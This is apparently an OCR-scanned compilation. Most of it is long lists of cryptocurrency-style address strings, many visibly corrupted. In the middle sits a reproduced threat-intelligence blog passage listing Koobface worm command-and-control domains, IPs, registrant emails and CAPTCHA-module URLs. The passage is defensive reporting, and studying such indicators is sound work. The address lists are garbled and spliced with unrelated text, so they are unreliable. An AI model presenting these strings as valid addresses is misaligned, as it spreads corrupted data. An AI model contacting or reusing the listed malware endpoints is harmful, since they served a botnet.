LADxWsaCd2ncetvCvTFSxwiyZKE62dAxg5 
LAdYRnJK7iRrPaSxKos1rCnJ7TsVBaAxyD 
LADyTTFSZKk8cbukqgvl4vhVCXB5Cbo2EH 
LAdywM13YGyPCGG99ZWG4ZvdY46KZSkVEt 
1LADZ4VpQCKbKxazDSsgNGWtBTdG3LBbWw/7 
1AdZQ3xcw8SMHEWURYo7Yz7M1uJm64UfBB 
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1AelH66Novo3saScW4T5zdZy23qN5iBCxH 
LAE2eTUaCof6wPEVQrfDn9nTBGWNjCopDk 
LAE4cq4wH7LL2A3TUr2a249LUmiiSgJNJn 
LAE4TJB9dJGpZ7wZe3jd9EtvvFJdXjFWT7 
LAE5nUonb4XSaqRGK7hS2FLw1DduE8NMZu 
LAE7XTYSfxXZNt1k98o0JyNnPGJFZiEeoqpD 
LAEavNrqjPnXHehNwzYxXJeMyLUhLuL94kKw 
LAEbp7CgMyx9rU9fe7N3UgDjGapjCjxv2Z 
1Aec6sdvaibMwyE4RQL8VLWX55cYzgEmyYc 
LAEEqcdNx79egaqUDVgsfUVyrqDc5M7DLK 
LAEFTphtLYZBNqDZNvLPfprjsM2JcCYKNF 
1AeGGXj6j7F97eKHnNS11MS2F7m3D28V98X 
1AeGpBMKVMGs5DmRzZJvvca3DAmfMjzcYV5 
LAEhRR23Pg2tzWFPSjxNW52T2DDnbRpMGT 
LAEJGOHsJHMVSV6yveCyiNMb18JxZameDi 
LAEjJLQS2Y32LkgDAwW6Sp6GvC5pwkwgTbuu 
1AeJteYBCky3 puHf3ToQt98kWrhCvHvbEF 
1AeKdAQ3ToYbjJZZsKZQU6wwduWmug48RGq 
1AeKrQqbbjeYkGbBC8TxTM97LGNpXRNQVB 
1AemdJooJ7R5DfgfTjPbLYncasdPuFxiQa 
1AeMfzqjRnJlqvGnRJ7nk62SyztRv9T6sq 
LAEn3pWkPN7BUeUICQKMx9zZtSLKpDX5iG 
LAEoWStD3X3vxQGLZFxfMdzGy15CQBAbDw 
LAEPLto6NyKfwsgFCfaPK4xScm4G4y2E8f 
LAEPz3qt5JclLHsopbi6aL63T4RY3ESeplq 
LAEqque98Gny3S4EwsF]XgCPXRfymcK7ms 
LAET5bvzK7tbKyGwNAbUBeVuZgD61vtFzC 
LAEvbJwNywF4kN356WSGvFTCy1d6urEfWP 
1AeVEJUo5QyCgjJWX5U7kZwNB3QBopMclu 
1LAeWfHj7kDruQqDcbdfWKAbGCsorLrY8Bn 
LAEzv9rAkZLUuBCAyFjJmh6b2qzKtzuzQet 
1AeZykTKGERmMbuNTwgZNWSaN/7gtjKHOHTH 
LAF6PivuTxpvQqPE4jBJzxzeNCVYShcuso 
1Af6r8xueRAHi4baBavFrJSVPG6DsGeSo2 
LAfF7FRTWT1WPahm377xHsY1HC2qx58BSR1 
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LAF98cYU40DPVNGzdXjRMxwmewMB5GNzgL 
LAFbcbtamoXcL7LYFZvVWnERUjvCZAbP2u) 
LAfE4g2HGAS7Q60FvZ5efQizUGLTb52y2y 
LAFEOVIPCUHDv8gqUaMV49THt]vTK7gy2Y 
LAFHBu6PHZNcAWNFS6cSPhwFDjdvczBiz3 
LAFiCbx7HVarBgFBP5xH8BdwNJKTRk3mvr 
LAfikzwJtUiIP7MU4AtuA2NZGejBccJcY96 
LAFKGPuZJGWR43445AdezmW2z5JSbAPZQ96 
LAfL7)xkD9parLaTfxX5eiXaLDBvMghz6Pn 
LAfMdkbdvTiFUSoTWwxsKhTgZ9wjvEiSwMs 
LAfNPbdR9OKDL9668Bp11Vnj8EvdDMkwG9i 
1AfnpkhYunFmZWb7tw2vwgc3DB99CU9HzZM 
LAFNUdWohNKNRxiKBr3mgubgUP3ESuyHtb 
LAFQY4xamfH5GUL4c410ZZQPBUBAn2iyh6 
LAFraHS340AH6Ztyw31v9kMsCjPgjymJ84 
1LAfszkKHZK8BhP3TrDzD8Po8mJSqc8FYVNE 
LAFuZpBWvxS3BuNGtwD8soHasNEelRvlyv 
LAFVQ4b9w9P4CiIAQ8ONsnRcxutqhzYxhwU 
LAFYMM6PfBtZ4R5w5GZVnarqmFR1YoaP43 
LAFZ3W7FkfKgW5R447VTSvmDQbKaCsuyy3 
LAFZEXPvutlbWBKGExcjcLMxx4GGbAHLZg 
LAG1Lh5rGG29wj6qMQoaBv1lhvFLCC1d5WqD 
1AG46URS5UbK1tyASbLoh3PHmprxQAYXah 
1Ag4fGng3WiPFcYsUi5jan6ve6A82kqSHG 
LAGANi80y2c4xysiL4gzMdrUNRjQLPVGMF 
1LAg4T8Ka2ncEcoUUSP7hGbxXPf6dnaZJNb7 
1Ag67GPA29toxZowvDPx2uZMPZdeehdP6u 
LAg6NRgY9uf 1 PtuWQ71sQauqxDtBtRXBjY 
LAG6yg8iZmMDcGPZ8y9MQSDgZNXTJTIVOVK 
LAG7RTXuUVDZVC8FAbrT qVZkysdcu9TYbyk 
LAGAgttPcfwFSxxThumvkv307bJLTRb1D4 
LAgaLv9WGFGHhzu9a8pwFWENE9QTCvqv4KE 
LAGDXbiAEwhTJwC3ypv8HMJK8TRJEK6Sgh 
LAGFUF3qHXHtlwumWcSLLgL2iGXTELEFup 
1AgfXu66q4hU3Rgrp3tHp25zrCpqSixa5E 
25442 


Currently active Koobface C &C domains, also participating in the CAPTCHA-solving, malware 
Campaigns: 

- piupiu-110809 .com - 85.234.141.92 

- xtsd20090815 .com - 85.234.141.92 - Email: bigvillyxxx@gmail.com 

- boomer-110809 .com - 85.234.141.92 

- upr200908013 .com - 85.234.141.92 - Email: kfmnmkswrnkcxlgpfdxb68@gmail.com 

- $uz11082009 .com - 85.234.141.92 - Email: xxmgbtwgdhyv@gmail.com 

- upr0306 .com - 221.5.74.46 China Unicom Guangdong province network - Email: bigvil- 
lyxxx@gmail.com 

- findhereandnow .com - 85.234.141.92 - Email: bigvillyxxx@gmail.com 


The CAPTCHA solving process on behalf of the infected victims, is exclusively targeting 
Google web properties (piupiu-110809 .com/cap/tempgoo/GOO8cdabdfe8d68013c6217- 
ce754a519194.jpg). Koobface worm’s captcha7.dll module is active at: 

- glavnij20090809 .com/cap/?a=get &i=1 &v=7 

- 5uZ11082009 .com/cap/?a=get &i=3 &v=7 

- boomer-110809 .com/cap/?a=get &i=4 &v=7 

- piupiu-110809 .com/cap/?a=get &i=2 &v=7 


BlueConnex Ltd has been notified. The Koobface gang continues enjoying the largest 
market share of systematic Web 2.0 abuse 


Related posts: 

[24]Movement on the Koobface Front 

[25]Koobface - Come Out, Come Out, Wherever You Are 
[26]Dissecting Koobface Worm’s Twitter Campaign 
[27]Dissecting the Koobface Worm’s December Campaign 
[28]Dissecting the Latest Koobface Facebook Campaign 
[29]The Koobface Gang Mixing Social Engineering Vectors 


Ukrainian "fan club" and the Koobface connection: 

[30]Dissecting a Swine Flu Black SEO Campaign 

[31]Massive Blackhat SEO Campaign Serving Scareware 

[32]From Ukrainian Blackhat SEO Gang With Love 

[33]From Ukrainian Blackhat SEO Gang With Love - Part Two 

[34]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Black- 
hat SEO Farms 

[35]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 

[36]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


This post has been reproduced from [37]Dancho Danchev’s blog. 
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LAgH4ygZ7G2fFnfLPntcCaEfdxXryk6CQAT 
1AGhXrcp6LeGbyzuq9mMKR1nG2uQig7HoL2 
LAGjqQtdn7P223U7B5Am5wyNgxQFxGLNyN 
LAGK1xYPnuekRgtG5gHzpPuq)6PZWHfYAC 
1AGku2X9UD2Y5E7E1wQckKfy5bcyPTPD43) 
1Agku4YA1Pt9pAoycqib13smWizuFGQVrG 
1Agkv6bWdeE7t1UH72vDdFtLsiGkNdgAPU 
1AgLyuuDmTw6incqwxk6TBimuQ9zZG5Whsb 
1AGnXGWtavgiWVqvrPP3k1ihtRwb4Ec77AS 
1AgoeoAvXQze7YZQpc7V9EAHHiuogRmCka 
LAgpUSSvBnAHxNpXMnAi6XVLZpkLxsGQv5 
LAgpWHW4HVERacciyFFJr4a85xFz7s9AnN 
LAgqtGkF4hBAnhdMkKrk5aLLfx3QcfBPRfY 
LAGRHvDf3ja3vqLU5UbpwR6v3jcuaMel1lYF 
1AGrYr84QbxcCdF Cf] 5fWQGEURRyVtfSJX 
1AGSMaehjRnhkwaLHzt4NKrbdBVgLGET12 
LAgsWKPvk43EgFqD7psDN47Svdn6V3Zckq 
LAgTQFMatWwDELhgwkG2T7X4MfrFANYzui 
1AGtwp27EbmS6xUe7t4M7ycLSD6Dvrqx68 
1AgUmaxXyJFBHUH1nQNcsjyBigyPCjMcN9d 
1Aguy4Uj2dfJVaY4V8cWFv7T2BKMKNZA6z 
LAgVCZ2CYL31u2W2GXny75ir] 7ZVNjQSdW 
lAgvv2VSy5KeXqbrNwaAZbj4C5di4vbKep 
LAgWLLy 1NSUSXGifP2KcwCqUHm7xL8yTLA 
1AgygS1d1A2YEowiLzTb9HHTdyxZcFhwbh 
LAH2NnQTYwu8VdsSxZ6qXuQFF7TpT8FsBA 
LAh5RY7uzJZH48UBG1HdzWCt2Zn6TmgPHj 
LAH8MviBhdv1RrBz4YtvNqmelrqLmpmLAz 
LAHbTU2EbDPmV5CYt9mcmMSPDc1zBxL9Q9 
1LAhEwfhgqevDypYc84bfiFTVc1Z4X6q443Q 
1Ahg7avfFGsLiHvgDPH28gNhLpEN9zqi6y 
LAHG8AqxJQPe9EGtm1dHyEpa3gt87o0JV7P 
LAHgv8BGsMHmrqw2DqB3DYAekH1o0hSPkKNV 
LAHHddDAxbRFSc1DzNEDuQLbnftugmSqQ7 
LAhhvWZN2JZrh6wf|MstQoDiBb6MGk7K8Y 
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LAhjbdj8RrnDnF9dWxuSs8AzQ9LJapQ8dw 
LAhJLTEK5J8dmF48kRYdniP81fh1YVRIJE 
LAHJTTIUthF5aA9wBGu84JEgcXSL9aqvL4 
LAHKr7uEemLay1AfSMaMtjMiPBUVUL9EJU 
LAHkzCbqgzwF9kxqC4zDNdXT6LNULZJ3p6 
LAHgx93YvKQrxy4jGrliSq42mFdtidyyis 
LAHR5CcreE80UK2AX92ZC2RZBz7f9db2SNE 
LAhS7MWnoz68CgV9cZv8SrUYbYBz5in6fo 
LAHSKNk2Kbdy7zSmFhcA1xKezGVcAB5So02 
LAhHU54H8huR4B1u1L5bxXfmxVtRs6E4a6e04 
LAHUvzbDYY4bykLymoQ5hdHqDYZ7LkdsCD 
LAHUYj6xYU4S4nJag23bexGFZC7qEDRtEL 
LAHVPdPfqP4jVxSTGTfFBpCRcfpZEtNpec 
LAhxN6EXseAU2dB22Nt8LGH1Cuezx33GmP 
LAhZHERgaZTvUp3UvEynaxXAnwnZr7aBFc 
LAi4XA87L1VL8BepPVWTVhR42cisL3HuLw 
LAiShV5iRroFj/ZwggjEXuHJF5tTrVkfPtt 
LAi8SMWs8NPfxhMj6PnK7KC66b5uzdXPuj 7 
LAi8sfxU2E99WiCdwHodRXBjA8rvtiBfLF 
LAiI9X5Py2S291AX5Lv6kjtoMM7Vedtwwn5 
LAiEePgioj9T6mdhzZzXgdBGGitdnvrjQE 
LAif1tDqhydCgHSfcenesgtjXsEJMKPJQly 
1AiHAarrtHbrL4nZSr5 76vnoGQWkBym2NL 
LAikL681NMzafC8TSRxHgkPcpzHrwTVtuq 
1AioU80nKpooCBQsWGLGuUFaRxLf6WZpzq 
LAirH6VUmiwAedoNR3gLEKDEgzsXbSTpxL 
LAirZQoToa7Y1QjFC8rBVRJGCpaqu6g]iU 
LAiuEdrNZynFnonVrSjyCBHj8SUVE4cjka 
LAiWA6LMLxDcvbFayz9r8umwgGrH9Tv9zZM 
LAiwWRruAVp3HemMur9qrW5A3Q7eP6kbQa 
LAj2k5pwe7sNFc3cpXSVm6YTJKpKmBao6r 
LAJ2V8csnrcRWkRxYaaT9IVB9YBOFLEYmbpj 
LAj3 1WK4cGSbPMopVsnmdweSCMq96N9UgE 
LAJANTmpyyWBdwuP66mh2w9FSAZBcNYRIm 
LAj4wF32CyLo7mekedowqxN7L3ig18Clpr 
25444 


1LAJ9ruA9YqQqHdPkPSu3HTgVMt2AjEXDtM 
1AJaA8ALqU4ezjJuvAG5AalR7PgaNCvctat 
1AJaBEp55ye8vxX4EJeW4Tz78ZYm2haUfGn 
LAjBdjgyQ6JArrxXaQheG5qLQMuyzuDFuUc 
LAjJBSYYXBSYNSY7GfYjtcGD1nX7Nnvn9Ga 
LAjJOWYAH2tDTLNb5aDfxoWCbkxX6j6xYBYQ 
LAJEC1IQ5qeNNGEfdX3SnHyvKD50GcAcleW 
LAJjEfggHtpgeSf6yCvLmz2Tgt5MdCoxcxS 
1LAJfUr6Zrvzh9LCoBBBXVt9wmFj8yaQYLL 
1LAjfyDxBbnjonmXYERgQxn8bucsrJrtGq} 
LAJFzvVRMLINXwQkjcvDPhUoC7fSW9wnivm 
LAjgfnMUTNKX9WQFQ380Lp2fH30qj4c6mk 
1AJGmG15BLgu6D6dKgueKmpjUSdxSAjPZW 
1LAJgVz9BXxq6wK66CdQJeNPR7ZADPHAPkg 
LAjHtnkxSiA8GSji13dNFHRhjXySSsjEGN 
LAJJESWVP6kLa30ZEHjnvWxfLU1qJDYe4r 
LAjJK646biIHDN6LYFLdF4JoxtbBxpNthbGN 
LAJLReiJsCL32SGUCNbQoEJwCMRmczx8ho 
1LAJmAawGnWUnYX4wSSEsbtpv8qQq7qyk6h 
LAjJMkoYaw81G5GnSP6Z9y6K4BYH6paw2BY 
1AJomDJZuGTqu2nxqksFFVvqgAmu59Z2N4r 
LAjqyJx497rzwpnUF9ZwX8rxXt9wckKKyPLY 
1AJr6JL75BotUJMK8EchQXaQEcaLvuFWzp 
1AjsQuoujMiwdWvqhCGcxy9vN15smwbeoy 
LAjt6kxWz430apibce8KCvs8yNc2B16qM5 
LAJUBQkexvn6MmaAB4RWMaP2nKDmAzEtp2 
1AJuxt8GoJQe1Q7iHyTMDKsaQp1z62HM3T 
LAjVyxnTDrqnijMGxNFsinjP9EfCWEwLhU 
LAJWXsYtjdvdeP92qZSryhHnQPSqrBWGmh 
LAjxCSfAwpgTCLcGbKxCZTVZ7AxDo2CUFb 
LAjJXRGxqBNZGKVmD)JfJ1fDVRASwVSwni13a 
LAJzZLVyBXhYJVtr5FwqvgjiHuwCxCFRW5s 
1AjzrMdNaz7Bdxb26DWFQ9t6qGHp4xERku 
1AK1Sjpywy6JNQCueUmugQ6ySjV8bnDqbr 
LAK3jYphUZjHHfrYsRRP2mng6ZY4sscM3 
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LAKbjbDBpybrUbvdntrVwaJfxXQjkseW6XK 
LAkCnUSHJCRhNACd3xromWLFdbHKMgTpoi 
LAKCyJsUhXsD1nrCXfTXk6MDrw6KCaQuzi 
LAKFVWGUN6QAYhF 1rhCLJjvG7Vx1ms2bHPV 
LAkKfXCRpTfhZpRW1Ec3y2YcpU6HZMpp74Kk 
LAKjINhXaQTShHRUMGjHV2yCNHou9o0eBnqd 
LAKJfQTaRD45z7RXc2cWoB92EBADdDrZ5G 
1AKkcpDwkA7sCwcV9M5o0aPjJPEQ9U8nbaf 
LAKmmudNngwvFcbpSNvGys IczoRqgNU4vv 
LAkMWawfdgYkWK2We79QiPCpJxrEwQYa3Y 
1LAkQb6pEm8kets46DZee7 TAHJHBdxXVEcU 
LAKRYS89hG4wR2jKchAGWPDromwiDWvXS7 
1LAkupJUHNHbS5NK4SSNEDvKnZUAfg58faJ 
1LAkuXi2gvTGmfXLrTKeDHgvMSSHYMabsfh 
LAKV4gj8qjqNrUtqMNdZUhkrMJjivGgYNJp 
LAKwVY7bzRB8K9BXbuhQuqnvnL4AWWay3k 
LAKYFAkJNMqaEHq11YtJwqeraa37VLKNjG 
LAKZNnDX8CMGqdZCWvrhb53hskeAPNromN 
LAL22ADnUEwCPPnbvr96xpkq3ekBstZ1ur 
LAL8Kbb9Cjx51EZv7yKLjNeCdMC1YSN6Gd 
LALO4bvn6rvPw8ccFcF3tbUyr9DZrmUbf3 
LALAUGFd7MPS67BKJJyzDQCwdbMGB6789 
LALB9ZxXcHMIRJ9YV7iIRXANL63SRjy3ShsA 
LALDPu4SMSTTLOMZVZsimonC9dBh5CTdex 
1LALe1CbqGWMPVLGUpgKGZbwcjxrxzwFP3e 
LALiKLGrfBcFvbLsHSzJ9koDfpgXcJ933S 
LALK1tKbmj7Ud3iaAnDzZUuakKb1zLg1E7eP 
LALLVhgxnpR2X5CYtAVFWA6rgg5DfhsyAq 
LALnNCFg1P77nRSsgvVxkk26nTqyU4EnPJ6 
LALNiymoeybu32GnZwatrGindL9xryKU93 
LALnNPx3JZnQ4BbHA2Ux8T Xtxbv6L9u5krF 
LALNQE9AuzgqLLCW2QVRsb34Vf8hZtndpz 
LALp7qhwcNAylqYjhguvX2EcWA2MURobfS 
LALXtTKYYuXpbSiwWLirnsJU9VoR2W4QyV 
LALZUKGxniXVkcdoBERpNre19257QH3R8R 
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LAMAET5NZXgj4QtqNFKgjD1AaETZuAfowr 
LAMBbJM77Bz2s8GSm1jVyg6dUhqQtNHjPE 
1AmbPPTYED9BLGZ2yvM8zyDKWzsrfVZDW2z 
LAMByP1bT2CPuMJbVt6UaLSaQmfB31UPVg 
1AmgQ3jXd3fheGw4H5n6ahQoas1lYxnVVzZC 
LAmhEx23mXtNUUbKXuxgBB9uU3pD5qRVaf 
1Amhgqii36cHVCaxBS6Y9zrfHLFYMwGMLN 
LAMHWXTvaMUshLHcvSbCwSWnvfP4R22cRd 
LAMLBnQ7jbczoddnm26gJQXwJWKMsNCrWo 
LAmLJdR1Kx1UWZXVbXPw4Q5sfDzid8nrr3 
1LAmMM9XgBJMZ5HTUF4R8XFF25Z3F2m8kjbU 
LAMMg4VLK9jh2BFWzaf9xSFWNak5wSzvhD 
LAMMNWvcamtxQ1YgBLt3Whabg8utpzZH6H 
LAMmxXj6sDpaL9wWHxJj5ZuWousrGk491sv 
LAMNRKaqf6fVZKa2R5gkjJsL14FU6qUKpwnV 
LAMQF3u8TfPFuo4VKLwyMEwhrKaQ8YyC6A 


1AmQpqdyBwSwLgq4QhxWwlmWV5TGXZivpL 


LAMrBAiE4FjXxNX8SdNQS5idsS4TNFrFj7n 
1AmsVB5P6fL97MrdYQ9cfcvW1RRZWNAQoF 
LAmtLPnE9hsZQ8vxnZh89ufANpsjsBJ3sL 
1LAmTPLujDo2YxUysrLUgGtcegowWTbRhWd 
LAMU7chUYHoAZDFhnE7qxST8feZ9bDfMrx 
LAMxoiMi346WYSazAvwkNXeWFDjZnS95Hi 
LAN1qjbNTaNobpY1zN4kfeK6mLfmUt5pPe 
1An30bEG8QVoaAZqD2FbYEh8XiKEUAmf1iL 
LAN4CijKEdfi4FAgsnGt3pY61HKGisQZQK 
LAN52aDiLLFutandmgEq/7e8cmZYN7kKfhd 
LAN89VDdj36tzajnJ3isppMXqvrti8dBHX 
1LAn99iIE2MdwuaYxQMLiZSSN7b9sFULRogY 
1An9b8pbD8cQrcRzFmKkghTsEhaNRgSQHP 
1Ana64DTFC)Jpz3NF3TNyXsCNYELeVYkKPSR 
LANAFHEgbiy1ZqrsBMHndXDP1LicN1INwdSm 
1AncpmyNnpBBMM3gPdC8acgcQ8PzxGEcFD 
LANgJWMsJcQQ4gCZ69HNbjHu3jN6b6RdMy 
LAnH3QXSpkoAif34yZPWND96UL91Uj5VBh 
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LANhV7R3tdte1PJMRZjEJAJJ2bCJE59Q4N 
LANjJ8V7bmh78Dq9HSfpkLjibHwG2Bu2NgZ 
LAnJTWQSPiINM7c2LCfeb4keVkmNFGyG6WY 
LANkKR6LyqcBvp6GkqMYtS9HyssdXEeCZ19 
LANkKY45rMAbVqsPbvxXGdsuxLEiyzddm7Kv 
LAnMAyvmnLXBGqwbAbnh96BCBjAidi9Vt7 
LANPBRyfsms59d1neoi7TjwmtRUXhMmDPo 
LAnNQmwjTeWF9ZHLI5fgnGnAqzQj7qoD7vx 
LANrwbjRhwC72QtDKs1INCnHkRwoNcaqtzle 
1LAnSt9mirB3PboYCfD1gMpMuVYBgZPEFav 
LANT6WCMJbEIMQbAHaJ8LzyH1liqU46r1fZ 
LAnV97MTCMSNit]XqyUEmnfxoy20VHySMx 
LANwhUptN5jdynvFMVbZ6D51dJ6pfEZmUc 
LANwuvFFCmcqww15Ci7SrTD51cmgYSc8d} 
LANWYgsVbANKCdUFEaZcAwpG9ktjf4Pt8a 
LANXGuHijqG8zZHcKvLFqkaoWT6BRPs5MvF 
1LAo3KN6iCepwCKCQnEcicFyM3ywrhmkbEw 
1LAo6nLmMUgBMpn4KDYwbschjJ8vp5MUryXy 
1AobdicMTvbvhDGt5zSrRnpsahPHdzxZ5z 
LAocNCq54TA84nhDCm7u3SdQ1eCRJa12Qx 
1AoCvRoKrPqPEV1Pg1rup9xwm4brE6neTi 
1AoDuxQUkc4qbPbQwMmLZ2GQUP8MA9Xc9] 
1AoedgGEa8524Lqopmp29347EuvirMH9tn5 
LAOFkKQoFnvPRCK2rxpv2uX1r1luD6HjPjBz 
1AoG69yW5yrnKqKMcRimbGvqCvLxwDAqQs 
1Ao0JZjDWsL5CoPuHJ795KxynyQ3Dt4gBwB 
LAoK6YUo0AAmBinktj31pGrrxXsSP1JtdznhM 
LAOKKHCrzgT2mjaVcqAkhZE3pU6GXZeDkj 
LAoLAK8WxRfhTFwamMBZn5zQDdtjjc28uD 
1LAoLFkyCepwo6WFIiLLdzEyzMtWJQSupyjq 
LAON8X50F84mqqtQFg3yDxpUXdwUCcNAvp 
LAONBYpVUy5Me6KN7ufwaLBaFBgpGW9EgL 
LaonJk1j2y93Qp9kjJZNp4iNJysFBcrueD 
1AoU2rZrCfADR3jyKKxX4roksTBnXWoGe3X 
LAOW77J7JB8BQV7b71ZmyEY1R5Bg3XHazwf 
25448 


1LAoXSgGRktXF6rpbWFy4Acn7Jsc93L5C7i 
1LAp3mjB6VGpnAuJTV9bCPBociaNbeoHQnx 
1Ap48Q2CCFLHNJ1xvug4baQLwUXUpq9Gf1 
LAP4nx9impiH2LYbRVshAxtNouJriaNRr1 
LApBPiZXcqG94K3BRQmwyXmsiEV7HdDE1z 
LApBRZHRcSF2bUsH2cbmaoce7kxXrfmiDUy 
LapCmkoY4YUQzv3PyZwE6mrS2qNkuCoMK 
LAPDn1XMk4ROUWIQ2yxXEisYPjxRAj2cZ7 
1LAPdNUVxbRtcs5ArmfQ7oqnHDj3b3ZD8AG 
LAPhJSaN35nkKhYx6USKCquu2V4rigjgfiR 
LAPhqvFuRpz9RBaAQreCxvKB469xXb8DRz 
1ApirS7XFM6E2iFJ3MycSVZFIQpj88KQEF 
1LApjSPofLvXEF1ZYwM9jK8zHheP4scQvh3 
LAPk4kXLuV2gh5P1n7i7Uy1BvUfSjuNfuh 
LApPGNDGTNRS5EkLyNeP3bsdwyLWcpxDkPN 
1ApPQkZeVDelnzamV]JcXEgjQGJpStfBHkh 
LApQuiEyZYEyZKaJAo9vudbrgQXLFVV5SU 
1AprRWpbSzPooC61UT8MbvKfn2afVmgNz6 
LAPRWUoe7yCs4ZGnjF24m7aMEDCA5w63Uq 
1Apu9Cq2dZmTLGaJLBnyDjEKZBLdwX3KB1 
1ApVnunuAD9TXkWPoNeQRH/7tq3fw1cM6SN 
1ApY6uap9fCTHZZTnjJLoFg5E6a1BRokfda 
LAPZtX8SU5XpMJEWcXfTphjkUDJnSuwzQ 
1Aq2S3RSxELZufY¥m3Kcbp5YqwkjJRC6jKX9 
1AQ7b3b21yd5s5D8EARPCVd6h392h4pN1C 
1AQaax3TfzDWc7rCm4K7N8f8TE8unz2un3 
LAQALLHyibEGYPGVErzn5Xf]gnQGeyEF2g 
LAqaMQnjJCDZybaeWpeoWzkEix4Dphm6wXk 
1LAqEoSt9MsDYeNRe2X5JoUY12qp2QgQQzm 
LAQGdK9vXfvP8jN1k1bG9hGk9Dfy9gfHxP 
LAQgvxEQpYxCQupYCxFcsjhJbYQgKp2Qj6 
LAQHNP3nCYrLu84WqGJKrNbpofar3HgFSW 
LAQHYAPWZMyo8NDdCxYCouCéL2bs56n2cp 
LAQKxVPkxrkqsrhBkgM94oahiThNgqHu6G 
LAQMTU3yTggfyGMK9F2FkrVZjKE8NJBXiz 


25449 


1Aqp2v5bGPwtY7EmwcPBEi74amk79y41CC 
1Aqp3dbcfuxVPjAS3rCoSrL4ngPfVv5zZNc 
LAQPS1V74552EHwnfVDwd1pMjJSErGDMgUz 
LAQR63Vo1mM1GVbKRTdNHGRB5yp7WDw8vSz 
1AQsQF5LxmcbLDTeHsbdRhg5KIrG6aCqEa 
LAQtsQBDwjNbpLigDXMh2t6woL9YSDIVSkL 
LAQU4UQWhP3kMwzFYj|WKSU7JzugkKmrkFzT 
LAqvWxwecDt8ypS29gQEd1lcTY¥mbUCwcEnD 
LAQWBMFx9AyPwkTRJNmM7gnDGbHxMz5yejP 
LAQxKHaz8L9tscPqT9RAxxqmdk963LxQzM 
1AqzM8io5D4hbuNZJBSsiakVPUBEurgzm8 
LAQzZPKUZHjt1t]3uS1VcAYKXsko2 Xo6wyr 
1Ar17M7yPZh7bC2r9decGPyh57jPP2cBuP 
1ArlalmUbjpHbG6onc1P6XTUEto89UjFcr 
LAR4zkb9kJxmpdALjLPpdjeu7t2drZAHo3 
1Ar6umeUG6Eftss41F42U5g26ohsYfqmz7S 
1ArAztPr4ZKd1VLUFWMBZpY5WXQKALopmz 
LARDjVEqbHUDhC3105jaeCL7Uw16X8u8iT 
LAREOZVQQNh4JXoB4G9mMMAU3Z3GPpbxXm8QNt 
LARh4T8EM3ECfAdQUhhSBy1DJKH7cZVjqw 
1Arh609RR6EFIkxMnGtFrAstVANUANLYNi 
LArhMVz4iR5VouAB4Lxq8ipXaLVodDXUi1 
LArHNCWbwNCStHbzb4ungX4AxxPH4cGLfw 
1ARiaelpUWNv5phDW2LFxRTdD3Di8FC2u0 
1LArKXc7NvXM6A86gukRofZK13X4bRGjf12 
LARMJ2hRjgyu9EnHuhMJ2NKnDnC4xBdzrl 
LArMmDJQtgrwXD4VVMbAf6H6tnmc4sLdB3 
1ArPFZBCAUR2fpEFbTAUKoi7Ng4XKo2TbV 
1ArpHyA1CCd1CYuaiec5kBSP31TmyKJYtV 
1LArPpAYteEpQNeC8BrL5mgfvaSpQiQrw8y 
LARQ4qKVcpcqHMB14jyTZWdaMLXbHz2bGW 
LARQNZmnEH8NaSAzCjxXPMqBJu3g32xJGV2 
LArSj4fHpRZHPrvtc91FU3W8b4FPTYBdhD 
1ARsVZolky9JZ5nHpR3uBnqT6jGodViRZs 
LARTideV24Y8yHKfB5APPoabRffeuqdkKhh 
25450 


1LARtnCayLazrgG] GYbu9sHf6GPBafMZKVU 
1ArumzvaWAbS7Wx4Z4eWk96jybHDjSRArD 
LARV1IBGHBVyoHpjx76NQvjJ4S51LQ3VSK] 
LARW8uRFCx4EzZw4H18VcEKjoCnP28RQF7X 
1ArZ7DbzBcNJPdXCVeqcPHmGZezr6g2fgP 
LARZVVNCE7kwyPLSWYn5by3mKYuWr2VGc6 
LARZxd5s4JWWxQzj9gM5J5EDaDc7yobfhs 
1As3GomFqBA5fRHnJdKbM92LikXwSZxSiu 
1As7uyd5RZheT4ziC5a4eTWwHLVXWrdRWQq 
LASbHgytVTxgrMHUC)p3LZRgZWsBgkt1irD 
1LAsBT91GcC4hLMxW4qpaudUBHDW2ykKBe4V 
1LASC)pYbesdwtHXXMLoiP7Geeu4 YuNw6tz 
1ASCvtcdKCPRmWaVsrA15RrSZmyzdwo3nf 
1LAsDx5f5W7LQCP9Dj9mMRbzcQ2gCDuPMmPGS 
1ASfm39U99deXgGBinhKsY6LASWzZkVMQLU 
LASfpYKDq3U90bckofYoUWmFnWaBeGWnQxX 
1AshleymGGsLS6yPCdX9ddDy6FR3gkGw9k 
1ASH1Hzu51axVDsxSjy74pfpNQ1BYBXMBy 
LAshmMVRJ3SMZwonDx1XuiEROMmAvmBXHe 
LAShnFCuXY5XqKfoojm4rwQjNPFdnaaWtk 
LaSiGj9LTmn27ejjRG37H9kKHWyvf9cKUV 
1AsJi3BKmgei3HzVQ836ivMHth9L5QnHh5 
1ASns3FR7eCe47PCgGzidhjUUhZSyTyjkw 
1AsPzJhkutSjQC7yBm8mLYgFAbGJEZLLRC 
1ASqcDoduVDWyNTTNPS5wC9LmFzJZAVU7N 
1LASqczKeavXUaFDnG2S1rr3x6skizYnGFC 
LASrwPjQTqvT TPieqvDKXCvVepV2BzkM61 
LAsTCCj6mMXNvMaFGTH3LPYRACphWZLee2B 
1Astdf6CpngqxMch3KiTnUPVUWRiEHyAGRL 
1ASto5DUuqSzkCy87CE5TSwStSziniWgKq 
1ASv65iurxnh9JMGCLazvVH9WZMUPpT01b8 
LASV8U0c2JoWv9WzbCeuBA8PFaY 7nSQb3G 
LASVSQWmrAx2v9p5M5QsDFtqeMQjHrEuuF 
1LASVvkCdAvsNtidUeekv7jugF8SwtUNZEV 
1AswG42bR4weVuLrKZ2Mry4E2XRzjMV187 


25451 


LAT5MPom2f56c7a74BpoV3C2JrGwe4Y3Tt 
1At6R7NBkAPe2wdSPEUMmAYDrkxxMwTteQZ 
LAt79SszRymfbkQKHJWXjdBjTxBQgFe28t 
LAt9nVAqv3TKUanxNLAduSgkWWn6qTogy7 
LATAhf76w 7J3fLghTuLx61RKS1wvoeDZVG 
LATAjlywUkR7StyEiTFFB1RdZrRxHPVYQW 
LATBfFWkAjjD4TNtr55zg96uSvq3jwXnsz1 
LAtcNij3rMqWB6KhPYcY7PZs7vxrvVkPRd 
LATEQ8TghnDeEa5aqEsZoxr6QWVvuBhsrL 
1AtfurDDGktfcLmyx9rpaiZweGKumzjZUc 
